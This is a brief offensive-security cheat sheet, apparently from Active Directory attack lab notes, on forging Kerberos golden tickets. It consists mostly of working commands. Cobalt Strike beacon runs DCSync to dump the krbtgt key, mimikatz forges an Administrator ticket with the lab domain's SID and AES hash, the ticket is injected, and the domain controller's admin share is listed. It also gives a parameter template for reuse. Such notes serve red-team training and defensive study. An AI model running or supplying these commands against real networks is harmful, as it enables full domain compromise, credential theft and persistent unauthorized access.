Golden Ticket

beacon> dcsync dev.cyberbotic.io DEV\krbtgt
mimikatz # kerberos::golden /user:Administrator /domain:dev.cyberbotic.io /sid:S-1-5-21-3263068140-2042698922-2891547269 /aes256:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /ticket:golden.kirbi
beacon> make_token DEV\Administrator FakePass
[+] Impersonated DEV\bfarmer
beacon> kerberos_ticket_use C:\Users\Administrator\Desktop\golden.kirbi
beacon> ls \\dc-2\c$
beacon> rev2self
# OR
kerberos::golden /user:<> /domain:<> /sid:<> /krbtgt:<> /ticket:golden.kirbi
kerberos::ptt golden.kirbi
user: is the username to impersonate (any user)
domain: is the FQDN of the current domain
sid: is the SID of the current domain
krbtgt: is the NTLM hash of the krbtgt account
ticket: is the filename to save as
Use /startoffset
, /endin
and /renewmax
to control the start offset, duration and the maximum renewals (all in minutes).
TIP: Get-DomainPolicy | select -expand KerberosPolicy
.

In the golden ticket, you’re not restricted to a single service, you got the KRBTGT so you can create your own TGT, so you can create a TGS for any service you want.
Last updated